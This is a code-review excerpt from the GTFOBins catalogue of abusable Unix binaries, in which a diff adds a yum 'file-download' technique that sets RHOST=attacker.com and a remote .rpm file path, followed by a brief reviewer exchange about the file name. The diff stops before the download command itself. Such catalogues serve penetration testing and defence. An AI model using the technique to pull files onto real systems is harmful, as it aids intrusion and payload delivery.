_gtfobins/yum.md

```diff
@@ -1,5 +1,11 @@
 ---
 functions:
+  file-download:
+    - description: Fetch a remote file via HTTP GET request. The file on the remote host must have an extension of `.rpm`, the content does not have to be an RPM file. The file will be downloaded to a randomly created directory in `/var/tmp`, for example `/var/tmp/yum-root-cR0O4h/`.
+      code: |
+        RHOST=attacker.com
+        RFILE=/tmp/file_to_get.tar.rpm
```

Comment:
Is `.tar` needed? Also I'd get rid of the `/tmp` part.

Reply:
Not needed, fixed